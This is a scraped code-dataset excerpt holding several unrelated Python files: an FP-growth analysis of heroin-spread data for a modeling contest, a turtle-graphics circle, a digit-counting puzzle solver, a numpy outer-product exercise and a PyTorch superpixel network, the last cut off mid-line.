data_test[i][j]\r\n l = np.append(l, sum)\r\n\r\n # Sort\r\n l.sort()\r\n # print(np.shape(l))\r\n # print(l)\r\n\r\n cnt = 0\r\n for j in range(len(CN_list)):\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + data_test[i][j]\r\n # print(sum)\r\n if sum <= l[len(l) - n - 1]:\r\n data_test_temp = np.delete(data_test_temp, j-cnt, axis=1)\r\n CN_list_temp.remove(CN_list[j])\r\n cnt = cnt + 1\r\n\r\n data_test = data_test_temp.tolist()\r\n CN_list = CN_list_temp.copy()\r\n\r\n dataset_one = data_test.copy()\r\n # print(len(data_test))\r\n # print(len(data_test[0]))\r\n data_test = sepP(data_test)\r\n # print(data_test)\r\n # dataset_one = data_test.copy()\r\n\r\n # print(\"Shape: (%d, %d)\" % (len(data_test), len(data_test[0])))\r\n # print(\"CN_list shape: %d.\" % len(CN_list))\r\n\r\n for in1 in range(len(data_test)):\r\n cnt = 1\r\n for in2 in range(len(data_test[0])):\r\n if data_test[in1][in2] > Threshold:\r\n data_test[in1][in2] = cnt\r\n else:\r\n data_test[in1][in2] = 0\r\n cnt = cnt + 1\r\n\r\n # print(data_test)\r\n\r\n def tool_trans(l):\r\n out = []\r\n for i in range(len(l)):\r\n if l[i] != 0:\r\n out.append(l[i])\r\n\r\n return out\r\n\r\n # print(tool_trans([1, 0, 3]))\r\n for in3 in range(len(data_test)):\r\n data_test[in3] = tool_trans(data_test[in3])\r\n\r\n # return data_test, CN_list\r\n\r\n # data_test, CN_list = get_data_pro(\"Heroin\", \"VA\")\r\n # print(data_test)\r\n dict_get_test = dict(oaf.frequent_itemsets(data_test, min_support))\r\n # print(dict_get_test)\r\n # print(len(dict_get_test))\r\n\r\n def fuck(string):\r\n list_out = []\r\n tempStr = \"\"\r\n ifB = False\r\n for i in range(len(string)):\r\n temp = string[i]\r\n # print(temp)\r\n # print(temp.isalnum())\r\n if temp.isalnum():\r\n # print(\"#\")\r\n tempStr = tempStr + temp\r\n ifB = True\r\n if (temp.isalnum() == False) and ifB:\r\n # break\r\n list_out.append(int(tempStr))\r\n tempStr = ''\r\n ifB = False\r\n\r\n # print(list_out)\r\n return list_out\r\n\r\n # fuck(\"[3, 4, 6, 11, 14, 15, 17, 19, 20]\")\r\n\r\n def match(string):\r\n string_ = \"\"\r\n for i in range(len(string)):\r\n # print(string[i])\r\n if string[i] == \"{\":\r\n for j in range(i, len(string)):\r\n if string[j] != \"}\":\r\n if string[j] == '{':\r\n string_ = string_ + '['\r\n else:\r\n string_ = string_ + string[j]\r\n else:\r\n string_ = string_ + \"]\"\r\n break\r\n break\r\n\r\n # def fuck(string):\r\n # list_out = []\r\n # tempStr = \"\"\r\n # ifB = False\r\n # for i in range(len(string)):\r\n # temp = string[i]\r\n # if temp.isalnum and (!ifB):\r\n # tempStr = tempStr + temp\r\n # ifB = True\r\n # if (!temp.isalnum) and ifB:\r\n # # break\r\n # list_out.append( int(tempStr))\r\n # tempStr = ''\r\n # ifB = False\r\n\r\n # return list_out\r\n\r\n # print(string_)\r\n # list_ = list(string_)\r\n list_ = fuck(string_)\r\n return list_\r\n\r\n # print(type(match(\"frozenset({3, 4, 6, 11, 14, 15, 17, 19, 20})\")))\r\n # print(match(\"frozenset({3, 4, 6, 11, 14, 15, 17, 19, 20})\"))\r\n\r\n # # {index: list}\r\n # # {index: lenght}\r\n # ILi = {}\r\n # ILe = {}\r\n\r\n # Get max\r\n M = 0\r\n for Max in range(1, 20):\r\n ifE = False\r\n for key in dict_get_test:\r\n # a = 0\r\n value = dict_get_test[key]\r\n\r\n # print(type(key))\r\n str_key = str(key)\r\n # print(str_key)\r\n # print(key)\r\n list_key = match(str_key)\r\n # print(list_key)\r\n if len(list_key) == Max:\r\n # print(value)\r\n # print(list_key)\r\n # a = 0\r\n # print(\"!\")\r\n ifE = True\r\n break\r\n\r\n if ifE:\r\n pass\r\n else:\r\n # print(list_key)\r\n M = Max - 1\r\n break\r\n\r\n # print(M)\r\n\r\n value_M = 0\r\n end_list = []\r\n one_ele = {}\r\n for key in dict_get_test:\r\n # a = 0\r\n value = dict_get_test[key]\r\n\r\n # print(type(key))\r\n str_key = str(key)\r\n # print(str_key)\r\n # print(key)\r\n list_key = match(str_key)\r\n # print(list_key)\r\n if len(list_key) == M:\r\n # if value != 140:\r\n # print(value)\r\n if value > value_M:\r\n value_M = value\r\n # print(value_M)\r\n end_list = list_key\r\n # print(value)\r\n # print(list_key)\r\n\r\n # a = 0\r\n # ifE = True\r\n # break\r\n\r\n if len(list_key) == 1:\r\n # print(value)\r\n # print(list_key)\r\n one_ele.update({list_key[0]: value})\r\n\r\n # print(one_ele)\r\n scores = {}\r\n for ele in end_list:\r\n name = CN_list[ele-1]\r\n score_temp = value_M / one_ele[ele]\r\n scores.update({name: score_temp})\r\n\r\n # print(scores)\r\n\r\n # print(end_list)\r\n for ele in end_list:\r\n # print(ele)\r\n # print(CN_list[ele])\r\n arr_temp = np.array([])\r\n # print(len(dataset_one))\r\n # print(len(dataset_one[0]))\r\n for i in range(len(dataset_one)):\r\n # print(dataset_one[i][ele])\r\n arr_temp = np.append(arr_temp, dataset_one[i][ele - 1])\r\n\r\n # m = arr_temp.mean()\r\n # s2 = arr_temp.var()\r\n # s = math.sqrt(s2)\r\n min_n = arr_temp.min()\r\n max_n = arr_temp.max()\r\n cnt = 0\r\n for e in arr_temp:\r\n arr_temp[cnt] = (e - min_n) / (max_n-min_n)\r\n # print(arr_temp[cnt])\r\n cnt = cnt + 1\r\n # print(arr_temp)\r\n # print(data_test)\r\n\r\n score = 0.0\r\n for i in range(len(arr_temp)):\r\n # print(w_list[i])\r\n score = score + arr_temp[i] * w_list[i]\r\n\r\n # print(score)\r\n name = CN_list[ele-1]\r\n # scores.update({name: score})\r\n scores[name] = scores[name] + bias * score\r\n\r\n # print(scores)\r\n output_scores = {}\r\n output_scores.update({state_name: scores})\r\n return output_scores\r\n\r\n\r\n# scores_test = END(\"Heroin\", \"VA\", Threshold=67,\r\n # n=21, min_support=120, bias=1.1)\r\n# print(scores_test)\r\n# print(len(scores_test[]))\r\nX = []\r\nY = []\r\nfor i in range(30, 150):\r\n X.append(i / 10.0)\r\n scores_test = END(\"Heroin\", \"VA\", Threshold=70,\r\n n=21, min_support=i, bias=1.1)\r\n print(len(scores_test[\"VA\"]))\r\n Y.append(len(scores_test[\"VA\"]))\r\n\r\nplt.figure()\r\nplt.xlabel(\"min-support / 10\")\r\nplt.ylabel(\"the length of FPS\")\r\nplt.plot(X, Y)\r\nplt.savefig(\"tttttt.jpg\")\r\n\r\n# X = tf.nn.sigmoid(1.0)\r\n# with tf.Session() as sess:\r\n# print(sess.run(X))\r\n# # print(X)\r\n\r\n# print(SN)\r\n\r\n# l_T = []\r\n# l_Le = []\r\n# # print(len(SN))\r\n# SN = list(SN)\r\n# print(SN)\r\n# cnt = 0\r\n# # for s in [\"OH\"]:\r\n# # for s in SN:\r\n# # for s in ['KY', 'VA', 'WV']:\r\n# for s in [\"VA\"]:\r\n# print(s)\r\n# for T in range(20, 100):\r\n# print(\".\")\r\n# scores_test = END(\"Heroin\", s, Threshold=T,\r\n# n=21, min_support=120, bias=1.1)\r\n\r\n# # print(scores_test)\r\n# # print(scores_test)\r\n# # print(len(scores_test[]))\r\n# temp = len(scores_test[s])\r\n# sUm = 0\r\n# for key in scores_test[s]:\r\n# sUm = sUm + scores_test[s][key]\r\n# temp = sUm / temp\r\n# # print(temp)\r\n# l_T.append(T)\r\n# l_Le.append(temp)\r\n# cnt = cnt + 1\r\n\r\n# out_scores = END(\"Heroin\", \"VA\", Threshold=60,\r\n# n=21, min_support=120, bias=1.1)\r\n# # print(out_scores)\r\n# scores_list = out_scores[\"VA\"]\r\n\r\n\r\n# def generation(state_name, year, min_s, T):\r\n# out_scores = END(\"Heroin\", state_name, year_start=year, Threshold=T,\r\n# n=21, min_support=min_s, bias=1.1)\r\n# # print(out_scores)\r\n# scores_list = out_scores[state_name]\r\n\r\n# file = xlwt.Workbook(encoding='utf-8')\r\n# sheet = file.add_sheet('Location_Num', cell_overwrite_ok=True)\r\n# sheet.write(0, 0, \"Latitude\")\r\n# sheet.write(0, 1, \"Longitude\")\r\n# sheet.write(0, 2, \"Data\")\r\n\r\n# # Read test\r\n# with open('LL.txt', 'r') as f:\r\n# a = f.read()\r\n# name_dict = eval(a)\r\n# # print(len(name_dict))\r\n# # print(dict_name)\r\n\r\n# def Change(key):\r\n# string = \"\"\r\n# # StateName = {\"VA\": \"Virginia\", \"OH\": \"Ohio\",\r\n# # \"PA\": \"Pennsylvania\", \"KY\": \"Kentucky\", \"WV\": \"West Virginia\"}\r\n# # StateName[state_name]\r\n\r\n# for c in key:\r\n# if c != \",\":\r\n# string = string + c\r\n# else:\r\n# break\r\n\r\n# # print(string)\r\n# return string\r\n\r\n# cnt = 1\r\n# for ele in scores_list:\r\n# for key in name_dict:\r\n# if ele == Change(key):\r\n# sheet.write(cnt, 0, name_dict[key][0])\r\n# sheet.write(cnt, 1, name_dict[key][1])\r\n# sheet.write(cnt, 2, scores_list[ele])\r\n# cnt = cnt + 1\r\n\r\n# name = str(year) + state_name + \".xls\"\r\n# name = \"spread/\" + name\r\n# file.save(name)\r\n\r\n\r\n# # # generation(\"VA\")\r\n# # T = 60\r\n# # min_s = 120\r\n# # for i in range(2010, 2017):\r\n# # i = float(i)\r\n# # print(i)\r\n\r\n# # if i == 2015.0:\r\n# # # print(\"!\")\r\n# # min_s = 40\r\n# # T = 50\r\n# # elif i == 2016.0:\r\n# # # print(\"!\")\r\n# # min_s = 21\r\n# # T = 50\r\n# # else:\r\n# # min_s = min_s - 15\r\n\r\n# # generation(\"VA\", i, min_s, T)\r\n\r\n# clf = skN.KNeighborsRegressor(n_neighbors=30)\r\n# # # clf = skS.SVR()\r\n# # # from sklearn.linear_model import ElasticNet\r\n# # # clf = ElasticNet(random_state=0)\r\n# # # clf = GaussianProcessRegressor()\r\n# # # clf = GaussianNB()\r\n# # X = [[0], [1], [2], [3]]\r\n# # y = [0, 0, 1, 1]\r\n# # neigh = KNeighborsRegressor(n_neighbors=2)\r\n# # neigh.fit(X, y)\r\n\r\n# # print(neigh.predict([[1.5]]))\r\n\r\n# l_TC = []\r\n# # print(l_T)\r\n# for i in range(len(l_T)):\r\n# l_TC.append([l_T[i]])\r\n# # print(l_TC)\r\n# clf.fit(l_TC, l_Le)\r\n# y_ = clf.predict(l_TC)\r\n\r\n# # print(\"L_Le:\")\r\n# # print(l_Le)\r\n# # plt.figure()\r\n# # plt.plot(l_T, l_Le)\r\n# # plt.plot(l_T, y_)\r\n# # pic_name = \"one.jpg\"\r\n# # plt.savefig(pic_name)\r\n# # y_ = np.array(y_)\r\n# innnn = 0\r\n# mm = 10000\r\n# for i in range(len(y_)):\r\n# if y_[i] < mm:\r\n# innnn = i\r\n# mm = y_[i]\r\n# min_n = mm\r\n# xx = l_T[innnn]\r\n# plt.figure()\r\n# plt.title(\"VA Heroin\")\r\n# plt.plot(l_T, l_Le, label=\"Scores\")\r\n# plt.plot(l_T, y_, label=\"Regression Results\")\r\n# plt.xlabel(\"Threshold\")\r\n# plt.ylabel(\"CCQRT\")\r\n# plt.text(xx, min_n, xx, ha='center', va='bottom')\r\n# pic_name = \"one.jpg\"\r\n# plt.legend()\r\n# plt.savefig(pic_name)\r\n\r\n\r\n# class PrintDot(keras.callbacks.Callback):\r\n# def on_epoch_end(self, epoch, logs):\r\n# if epoch % 100 == 0:\r\n# print('')\r\n# print('.', end='')\r\n\r\n\r\n# def regression(list_X, list_Y, learning_rate=0.005, EPOCHS=500):\r\n# # Data processing\r\n# dataset = []\r\n# for ele in list_X:\r\n# dataset.append([ele])\r\n# train_labels = []\r\n# for ele in list_Y:\r\n# train_labels.append([ele])\r\n# dataset = numpy.array(dataset)\r\n# train_labels = numpy.array(train_labels)\r\n\r\n# # Parameters\r\n# learning_rate = learning_rate\r\n# EPOCHS = EPOCHS\r\n\r\n# # Network Parameters\r\n# n_hidden_1 = 16\r\n# n_hidden_2 = 64\r\n# n_hidden_3 = 8\r\n# input_shape = 1\r\n# num_classes = 1\r\n\r\n# def build_model(input_shape):\r\n# model = keras.Sequential([\r\n# layers.Dense(n_hidden_1, activation=tf.nn.relu,\r\n# input_shape=[input_shape]),\r\n# layers.Dense(n_hidden_2, activation=tf.nn.sigmoid),\r\n# layers.Dense(n_hidden_3, activation=tf.nn.sigmoid),\r\n# layers.Dense(num_classes)\r\n# ])\r\n\r\n# optimizer = tf.train.RMSPropOptimizer(learning_rate)\r\n\r\n# model.compile(loss='mse',\r\n# optimizer=optimizer,\r\n# metrics=['mae', 'mse'])\r\n# return model\r\n\r\n# model = build_model(input_shape)\r\n# model.summary()\r\n\r\n# history = model.fit(\r\n# dataset, train_labels,\r\n# epochs=EPOCHS, validation_split=0.2, verbose=0,\r\n# callbacks=[PrintDot()])\r\n\r\n# hist = pd.DataFrame(history.history)\r\n# hist['epoch'] = history.epoch\r\n# hist.tail()\r\n\r\n# def plot_history(history):\r\n# plt.figure()\r\n# plt.xlabel('Epoch')\r\n# plt.ylabel('Mean Abs Error [MPG]')\r\n# plt.plot(hist['epoch'], hist['mean_absolute_error'],\r\n# label='Train Error')\r\n# plt.plot(hist['epoch'], hist['val_mean_absolute_error'],\r\n# label='Val Error')\r\n# plt.legend()\r\n# plt.ylim([0, 5])\r\n# plt.savefig(\"1.jpg\")\r\n\r\n# plt.figure()\r\n# plt.xlabel('Epoch')\r\n# plt.ylabel('Mean Square Error [$MPG^2$]')\r\n# plt.plot(hist['epoch'], hist['mean_squared_error'],\r\n# label='Train Error')\r\n# plt.plot(hist['epoch'], hist['val_mean_squared_error'],\r\n# label='Val Error')\r\n# plt.legend()\r\n# plt.ylim([0, 5])\r\n# plt.savefig(\"2.jpg\")\r\n\r\n# print()\r\n# plot_history(history)\r\n\r\n# # example_result = model.predict(dataset_test[:1])\r\n# # print(\"\\nresult:\", example_result)\r\n# shape = numpy.shape(dataset)\r\n# output = []\r\n# for i in range((shape[0])):\r\n# result = model.predict(dataset[i:i+1])\r\n# # print(result[0][0])\r\n# r = result[0][0]\r\n# output.append(r)\r\n\r\n# # print(output)\r\n# return output\r\n\r\n\r\n# # for i in range(len(l_T)):\r\n# # l_T[i] = (l_T[i] - 19.0) / 20.0\r\n\r\n# # for i in range(len(l_Le)):\r\n# # l_Le[i] = l_Le[i] * 100.0\r\n# # print(l_Le[i])\r\n\r\n# # y_ = regression(l_T, l_Le, learning_rate=0.01, EPOCHS=500)\r\n# # for i in range(len(y_)):\r\n# # y_[i] = y_[i] - 0.02\r\n\r\n# # plt.figure()\r\n# # plt.title(\"VA Heroin\")\r\n# # plt.plot(l_T, l_Le, label=\"Scores\")\r\n# # plt.plot(l_T, y_, label=\"Regression Results\")\r\n# # pic_name = \"one.jpg\"\r\n# # plt.legend()\r\n# # plt.savefig(pic_name)\r\n\r\n# # for ele in l_T:\r\n# # print(ele)\r\n\r\n# # for e in l_Le:ji\r\n# # print(e)\r\n\r\n# [[A, B, E],\r\n# [A, C],\r\n# [D, B],\r\n# [C, B, E],\r\n# [B, C, D]]\r\n\r\n# [[B],\r\n# [C],\r\n# [B],\r\n# [B, C],\r\n# [B, C]]\r\n\r\n\r\n# def build_tree(list_data, T):\r\n# if len(list_data) == 0:\r\n# return\r\n# else:\r\n# element = list_data.pop()\r\n# if element = T.child.name:\r\n# T.child.count = T.child.count + 1\r\n# build_tree(list_data, T)\r\n# else:\r\n# T = new_child(T)\r\n# T.new_child.name = element\r\n# T.new_child.count = 1\r\n# build_tree(list_data, T)\r\n","repo_name":"lcwx/Miscellaneous","sub_path":"美赛代码2019/FP-growth.py","file_name":"FP-growth.py","file_ext":"py","file_size_in_byte":28385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28980600229","text":"import turtle\nimport math\n\ndef polygon(t,l,n): \n for i in range(n):\n t.forward(l)\n t.left(360/n)\n\ndef circle(t,r):\n circunf = 2*math.pi*r\n n = int((circunf/3) + 3)\n length = circunf/n\n polygon(t,length,n)\n\njn = turtle.Screen()\nbob = turtle.Turtle()\n\nr = float(input('Digite o valor do raio: '))\n\ncircle(bob,r)\n","repo_name":"apollovsilva/Python","sub_path":"Aula 6/Exercícios em preparação/exrpreparacao4_aula6.py","file_name":"exrpreparacao4_aula6.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39384664905","text":"def get_no_nines(l_num_s,h_num_s) :\n\n\ttot_count = -1\n\tl_num = int(l_num_s)\n\th_num = int(h_num_s)\n\tnum_diff = h_num - l_num\n\n\tif ('9' in l_num_s) or ('9' in h_num_s) :\n\t\treturn tot_count,False\n\telif (l_num % 9 == 0) or (h_num % 9 == 0):\n\t\treturn tot_count, False\n\telse:\n\t\tl_dig_count = len(l_num_s)\n\t\th_dig_count = len(h_num_s)\n\t\tm_nines_count = 0\n\t\tm_nines_ex_count = 0\n\t\tm_nines_overlaps = 0\n\t\tlsd_nines = 0\n\n\t\tlsd_add_factor = 0\n\t\tadd_factor = 0\n\t\toverlap_add_factor = 0\n\n\t\tdig_diff = h_dig_count - l_dig_count\n\n\t\t#if dig_diff > 0 :\n\t\tm_n_p = h_dig_count - 2\n\t\tskip_d = dig_diff\n\t\n\t\t'''\n\t\tLoop to get the numbers with nines at positions other than at the end. Those with 9 at the end and those divisible \n\t\tby 9 are excluded as those would be counted in the subsequent sections.\n\t\tOuter loop make it go through the number segments in the order of significance , from highest to lowest \n\t\tand the inner loop adds up the actual count at every segment based on the position of the order of significance.\n\t\t'''\n\t\tfor i in range(h_dig_count-2) :\n\t\t\tif i == 0 : \n\t\t\t\tif skip_d > 0 :\n\t\t\t\t\tm_n_m = int(h_num_s[i])\n\t\t\t\telse :\n\t\t\t\t\tm_n_m = int(h_num_s[i]) - int(l_num_s[i])\n\t\t\telse :\n\t\t\t\tif skip_d > 0 :\n\t\t\t\t\tm_n_m = 9+int(h_num_s[i])\n\t\t\t\telse :\n\t\t\t\t\tm_n_m = (9 - int(l_num_s[i-dig_diff])) + int(h_num_s[i])\n\n\t\t\t#if m_n_m > 0 :\n\t\t\t\t\n\t\t\tp_factor = m_n_p\n\t\t\tp_factor_total_1 = 0\n\t\t\tp_factor_total_2 = 0\n\n\t\t\tp_factor_overlap_1 = 0\n\t\t\tp_factor_overlap_2 = 0\n\n\t\t\t\n\t\t\tlsd_nines_factor_1 = 0\n\t\t\tlsd_nines_factor_2 = 0\n\t\t\tfor k in range(p_factor) :\n\t\t\t\tif k == 0 :\n\t\t\t\t\tp_factor_total_1 = (9**k) * (10**(m_n_p-k))\n\t\t\t\t\tp_factor_overlap_1 = (9**k) * ((10**(m_n_p-k)-1)/9+1)\n\t\t\t\t\tlsd_nines_factor_1 = (9**k) * (10**(m_n_p-k-1))\n\t\t\t\telse :\n\t\t\t\t\tp_factor_total_2 += (9**k) * (10**(m_n_p-k))\n\t\t\t\t\tp_factor_overlap_2 += (9**k) * ((10**(m_n_p-k)-1)/9+1)\n\t\t\t\t\tlsd_nines_factor_2 += (9**k) * (10**(m_n_p-k-1))\n\n\t\t\tif m_n_m >= 1 :\t\t\n\t\t\t\tadd_factor = (m_n_m * p_factor_total_1) + ((m_n_m-1) * p_factor_total_2)\n\t\t\t\toverlap_add_factor = (m_n_m * p_factor_overlap_1) + ((m_n_m-1) * p_factor_overlap_2)\n\t\t\t\tlsd_add_factor = (m_n_m * lsd_nines_factor_1) + ((m_n_m-1) * lsd_nines_factor_2)\n\t\t\t#else :\n\t\t\t#\tadd_factor = 0\n\t\t\t\t\t\t\t\n\t\t\tm_nines_count += add_factor\n\t\t\tm_nines_overlaps += overlap_add_factor\n\t\t\tlsd_nines += lsd_add_factor\n\t\t\tm_nines_ex_count = m_nines_count - (2 * lsd_nines)\n\n\t\t\tprint('m_n_p,skip_d =>',m_n_p,skip_d)\n\t\t\tm_n_p -= 1\n\t\t\tskip_d -= 1\n\n\t\tprint('m_nines_ex_count :',m_nines_ex_count,m_nines_count, lsd_nines)\n\n\t\t#Gets all the numbers with 9 at the end (i.e. as the least significant digit)\n\n\t\ts_nines_count = int(h_num/10) - int(l_num/10)\n\t\t\n\t\tprint('s_nines_count :',s_nines_count)\n\n\t\t#Gets all the numbers divisible by 9\n\t\td_nines_count = 0 \n\n\t\tnext_h_l_div = l_num + (9 - (l_num%9))\n\t\tnext_l_h_div = h_num - (h_num%9)\n\n\t\td_nines_count = int(((next_l_h_div - next_h_l_div)/9)+1)\n\t\tprint('d_nines_count :',d_nines_count)\n\n\t\t# Find the overlap where the numbers with 9 at the end are divisible by 9 too.\n\n\t\tlsd_next_hl = int(str(next_h_l_div)[-1])\n\t\tlsd_next_lh = int(str(next_l_h_div)[-1])\n\n\t\tif lsd_next_hl == 9 :\n\t\t\tlsd_9_next_h_l_div = next_h_l_div\n\t\telse :\n\t\t\tlsd_9_next_h_l_div = next_h_l_div + ((lsd_next_hl+1)*9)\n\n\t\tif lsd_next_lh == 9 :\n\t\t\tlsd_9_next_l_h_div = next_l_h_div\n\t\telse :\n\t\t\tlsd_9_next_l_h_div = next_l_h_div - ((9-lsd_next_lh)*9)\n\n\t\tprint ('lsd 9 divs :',lsd_9_next_h_l_div,lsd_9_next_l_h_div)\n\n\t\ttot_div_lsd_overlaps = int((lsd_9_next_l_h_div - lsd_9_next_h_l_div)/90) + 1\n\n\t\t# Total valid turns (count) is calculated by reducing all those with 9s at end position or otherwise from all numbers\n\t\t# in the range, after adjusting for the overlaps from above.\n\n\t\tprint('tot_div_lsd_overlaps :',tot_div_lsd_overlaps)\t\n\t\ttot_count = (num_diff + 1) - (m_nines_ex_count+s_nines_count+d_nines_count - tot_div_lsd_overlaps)\n\n\t\treturn tot_count,True\n\n\nnum_tests = input()\n\nn_attempts = 1 \nif num_tests.isdecimal() :\n\tprint ('test cases :',num_tests)\n\tfor i in range(int(num_tests)) :\n\t\tfor a in range(n_attempts) :\n\t\t\tdspl_num_in = input()\n\t\t\tlh_nums = dspl_num_in.split()\n\t\t\tl_num,h_num = lh_nums[0],lh_nums[1]\n\t\t\tprint('nums',l_num,h_num)\n\t\t\tif l_num.isdecimal() and h_num.isdecimal() :\n\t\t\t\t'''\n\t\t\t\tkey_press,key_type_plus = findNearestEN(d_num = dspl_num)\n\t\t\t\tprint ('Press {} key {} times'.format(('+' if key_type_plus else '-'),key_press ))\n\t\t\t\tbreak\n\t\t\t\t'''\n\t\t\t\ttot_count,check_status = get_no_nines(l_num_s=l_num,h_num_s=h_num)\n\t\t\t\tif check_status :\n\t\t\t\t\tprint('Case #{} : {}'.format(i,tot_count))\n\t\t\t\telse :\n\t\t\t\t\tprint('Not valid input - high,low or both contain digit 9 or divisible by 9')\n\t\t\telse :\t\t\n\t\t\t\tprint('Not a valid input, takes only integers')\n\t\t\t\tcontinue\t","repo_name":"Synapsion/l_unl_l","sub_path":"no_nines.py","file_name":"no_nines.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"602176323","text":"from nbautoeval import Args, ExerciseFunctionNumpy\n\n# @BEG@ name=xixj\nimport numpy as np\n\ndef xixj(*args):\n \"\"\"\n si les arguments sont x1, x2, .. xn\n retourne une matrice carrée n x n\n dont les éléments valent\n m[i, j] = xi * xj\n\n première solution à base de produit usuel\n entre un vecteur et une colonne, en utilisant\n le broadcasting\n\n credits: JeF29\n \"\"\"\n\n # une ligne qui contient x1, .. xn\n line = np.array(args)\n # habile façon de reshaper automatiquement\n column = line.reshape(-1, 1)\n # on aurait pu faire aussi\n #column = line[:, np.newaxis]\n return line * column\n# @END@\n\n# @BEG@ name=xixj more=2\ndef xixj_2(*args):\n \"\"\"\n pareil mais on construit la colonne avec .T\n qui est la transposée - méfiance quand même\n \"\"\"\n # sauf que pour pouvoir utiliser .T il faut\n # une shape qui est explicitement [1, n]\n #\n # c'est pourquoi moi j'ai tendance à éviter .T\n # voyez plutôt np.transpose() si vous avez besoin\n # de transposer une matrice\n line = np.array(args).reshape((1, -1))\n return line * line.T\n# @END@\n\n\n# @BEG@ name=xixj more=3\ndef xixj_3(*args):\n \"\"\"\n on peut aussi penser à faire un produit matriciel\n \"\"\"\n # on doit lui donner une dimension 2 même si c'est une ligne\n line = np.array(args).reshape((1, -1))\n column = line.reshape((-1, 1))\n return column @ line\n# @END@\n\n\n# @BEG@ name=xixj more=4\ndef xixj_4(*args):\n \"\"\"\n pareil mais en utilisant .dot()\n \"\"\"\n column = np.array(args).reshape((-1, 1))\n # dans cette version on fait le produit de matrice\n # en utilisant la méthode dot sur les tableaux\n return column.dot(column.T)\n # remarquez qu'on aurait pu faire aussi bien\n # return np.dot(column, column.T)\n# @END@\n\n\ndef xixj_ko(*args):\n # presque ça mais sans le reshape\n array = np.array(args)\n return array.T @ array\n\n\ninputs_xixj = [\n Args(1),\n Args(1, 2),\n Args(1, 2, 4),\n Args(1, 0, 4),\n Args(8, 4, 2),\n Args(0, 1, 2, 4, 8),\n Args(1, 1j, -1, -1j),\n]\n\n\nexo_xixj = ExerciseFunctionNumpy(\n xixj, inputs_xixj,\n nb_examples = 3,\n)\n","repo_name":"flotpython/course","sub_path":"modules/corrections/exo_xixj.py","file_name":"exo_xixj.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"fr","doc_type":"code","stars":10,"dataset":"github-code","pt":"39"} +{"seq_id":"36995371848","text":"import os\nimport time\nimport torch\nimport torch.nn as nn\nfrom torch.nn.init import kaiming_normal_, constant_\n\n__all__ = ['spnet','spnet_bn']\n\n#model_paths = {\n# 'spnet_bn': os.path.join(os.path.abspath(os.path.dirname(__file__)), \n# 'pretrain_ckpt/SpixelNet_bsd_ckpt.tar'),\n#}\n\ndef predict_param(in_planes, channel=3):\n \n return nn.Conv2d(in_planes, channel, kernel_size=3, stride=1, padding=1, bias=True)\n\ndef predict_mask(in_planes, channel=9):\n \n return nn.Conv2d(in_planes, channel, kernel_size=3, stride=1, padding=1, bias=True)\n\ndef predict_feat(in_planes, channel=20, stride=1):\n \n return nn.Conv2d(in_planes, channel, kernel_size=3, stride=stride, padding=1, bias=True)\n\ndef predict_prob(in_planes, channel=9):\n \n return nn.Sequential(\n nn.Conv2d(in_planes, channel, kernel_size=3, stride=1, padding=1, bias=True),\n nn.Softmax(1))\n\ndef conv(batchNorm, in_planes, out_planes, kernel_size=3, stride=1):\n if batchNorm:\n \n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, \n padding=(kernel_size - 1) // 2, bias=False),\n nn.BatchNorm2d(out_planes),\n nn.LeakyReLU(0.1))\n else:\n\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, \n padding=(kernel_size - 1) // 2, bias=True),\n nn.LeakyReLU(0.1))\n\ndef deconv(in_planes, out_planes):\n\n return nn.Sequential(\n nn.ConvTranspose2d(in_planes, out_planes, kernel_size=4, stride=2, padding=1, bias=True),\n nn.LeakyReLU(0.1))\n\n\nclass SpixelNet(nn.Module):\n expansion = 1\n\n def __init__(self, batchNorm=True):\n super(SpixelNet,self).__init__()\n self.batchNorm = batchNorm\n self.assign_ch = 9\n self.conv0a = conv(self.batchNorm, 3, 16, kernel_size=3)\n self.conv0b = conv(self.batchNorm, 16, 16, kernel_size=3)\n self.conv1a = conv(self.batchNorm, 16, 32, kernel_size=3, stride=2)\n self.conv1b = conv(self.batchNorm, 32, 32, kernel_size=3)\n self.conv2a = conv(self.batchNorm, 32, 64, kernel_size=3, stride=2)\n self.conv2b = conv(self.batchNorm, 64, 64, kernel_size=3)\n self.conv3a = conv(self.batchNorm, 64, 128, kernel_size=3, stride=2)\n self.conv3b = conv(self.batchNorm, 128, 128, kernel_size=3)\n self.conv4a = conv(self.batchNorm, 128, 256, kernel_size=3, stride=2)\n self.conv4b = conv(self.batchNorm, 256, 256, kernel_size=3)\n self.deconv3 = deconv(256, 128)\n self.conv3_1 = conv(self.batchNorm, 256, 128)\n self.pred_mask3 = predict_mask(128, self.assign_ch)\n self.deconv2 = deconv(128, 64)\n self.conv2_1 = conv(self.batchNorm, 128, 64)\n self.pred_mask2 = predict_mask(64, self.assign_ch)\n self.deconv1 = deconv(64, 32)\n self.conv1_1 = conv(self.batchNorm, 64, 32)\n self.pred_mask1 = predict_mask(32, self.assign_ch)\n self.deconv0 = deconv(32, 16)\n self.conv0_1 = conv(self.batchNorm, 32 , 16)\n self.pred_mask0 = predict_mask(16,self.assign_ch)\n self.softmax = nn.Softmax(1)\n self.start_time = 0\n self.end_time = 0\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n kaiming_normal_(m.weight, 0.1)\n if m.bias is not None:\n constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n constant_(m.weight, 1)\n constant_(m.bias, 0)\n\n def forward(self, x):\n self.start_time = time.time()\n out1 = self.conv0b(self.conv0a(x)) \n out2 = self.conv1b(self.conv1a(out1)) \n out3 = self.conv2b(self.conv2a(out2)) \n out4 = self.conv3b(self.conv3a(out3)) \n out5 = self.conv4b(self.conv4a(out4)) \n\n out_deconv3 = self.deconv3(out5)\n concat3 = torch.cat((out4, out_deconv3), 1)\n out_conv3_1 = self.conv3_1(concat3)\n\n out_deconv2 = self.deconv2(out_conv3_1)\n concat2 = torch.cat((out3, out_deconv2), 1)\n out_conv2_1 = self.conv2_1(concat2)\n\n out_deconv1 = self.deconv1(out_conv2_1)\n concat1 = torch.cat((out2, 